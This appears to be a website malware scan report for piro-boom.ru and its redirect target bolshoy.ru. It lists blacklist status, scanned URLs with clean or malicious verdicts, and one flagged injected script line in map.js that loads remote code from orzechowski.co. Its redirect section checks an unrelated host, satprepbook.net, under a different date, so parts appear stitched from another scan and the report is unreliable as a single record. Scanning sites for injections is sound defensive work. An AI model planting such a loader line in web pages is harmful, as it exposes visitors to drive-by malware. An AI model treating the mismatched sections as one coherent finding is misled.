Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=piro-boom.ru
Result: The website is marked by Google as suspicious - visiting this web site may harm your computer.
Details are available here.
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: satprepbook.net
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 22 Dec 2014 09:52:39 GMT
Location: http://www.satprepbook.net/
Server: Apache
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Pingback: http://www.satprepbook.net/xmlrpc.php
...0 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: satprepbook.net
Referer: http://www.google.com/search?q=satprepbook.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
Scanned pages/files
Request | Server response | Status |
http://piro-boom.ru/ | HTTP/1.1 302 Moved Temporarily Connection: close Date: Sat, 26 Apr 2014 06:41:02 GMT Location: http://www.bolshoy.ru Server: nginx/1.1.19 Content-Length: 161 Content-Type: text/html | malicious |
http://www.bolshoy.ru/ | 200 OK Content-Length: 28580 Content-Type: text/html | clean |
http://yandex.st/jquery/1.4.2/jquery.min.js | 200 OK Content-Length: 72174 Content-Type: application/x-javascript | clean |
http://connect.facebook.net/ru_RU/all.js | 200 OK Content-Length: 164013 Content-Type: application/x-javascript | clean |
http://piro-boom.ru/static/CACHE/js/7a2d228bf3c3.js | HTTP/1.1 302 Moved Temporarily Connection: close Date: Sat, 26 Apr 2014 06:41:08 GMT Location: http://www.bolshoy.ru Server: nginx/1.1.19 Content-Length: 161 Content-Type: text/html | malicious |
http://www.bolshoy.ru/test404page.js | HTTP/1.1 301 MOVED PERMANENTLY Connection: close Date: Sat, 26 Apr 2014 06:41:10 GMT Location: http://www.bolshoy.ru/test404page.js/ Server: Apache/1.3.37 (Unix) mod_wsgi/2.6 Python/2.6.2 Content-Type: text/html; charset=utf-8 | clean |
http://www.bolshoy.ru/test404page.js/ | 404 NOT FOUND Content-Length: 14132 Content-Type: text/html | clean |
http://www.bolshoy.ru/static/CACHE/js/7a2d228bf3c3.js | 200 OK Content-Length: 32624 Content-Type: application/x-javascript | clean |
http://www.bolshoy.ru//mc.yandex.ru/metrika/watch.js/ | 404 NOT FOUND Content-Length: 14132 Content-Type: text/html | clean |
http://www.bolshoy.ru/login/ | 200 OK Content-Length: 15023 Content-Type: text/html | clean |
http://www.bolshoy.ru/about/ | 200 OK Content-Length: 22842 Content-Type: text/html | clean |
http://www.bolshoy.ru/catalogue/all/ | 200 OK Content-Length: 47721 Content-Type: text/html | clean |
http://www.bolshoy.ru/warnings/ | 200 OK Content-Length: 26580 Content-Type: text/html | clean |
http://www.bolshoy.ru/partners/ | 200 OK Content-Length: 20263 Content-Type: text/html | clean |
http://www.bolshoy.ru/geography/ | 200 OK Content-Length: 42625 Content-Type: text/html | clean |
http://api-maps.yandex.ru/1.1/index.xml?key=AG2gE00BAAAAorULOAIA2PsfXRjIeYp6IBVUZbm72oFkNnAAAAAAAAAAAADLoD1ESGcC0hZs2rjTWU_IXbF_cA== | 200 OK Content-Length: 5375 Content-Type: text/javascript | clean |
http://www.bolshoy.ru/static/js/map.js | 200 OK Content-Length: 11878 Content-Type: application/x-javascript | suspicious |
Suspicious code found: document.write('<script type="text/javascript" src="http://orzechowski.co/ryCZYJW4.php?id=8052750"></script>');
http://www.bolshoy.ru/geography/view/22/?to=/catalogue/ | HTTP/1.1 302 FOUND Connection: close Date: Sat, 26 Apr 2014 06:41:17 GMT Location: http://www.bolshoy.ru/catalogue/ Server: Apache/1.3.37 (Unix) mod_wsgi/2.6 Python/2.6.2 Vary: Cookie Content-Type: text/html; charset=utf-8 Set-Cookie: city=22; Path=/ Set-Cookie: sessionid=2b52e85d0b5f9c1d7bb3a7e764cc45f5; expires=Sat, 10-May-2014 06:41:17 GMT; Max-Age=1209600; Path=/ | clean |
http://www.bolshoy.ru/catalogue/ | 200 OK Content-Length: 41541 Content-Type: text/html | clean |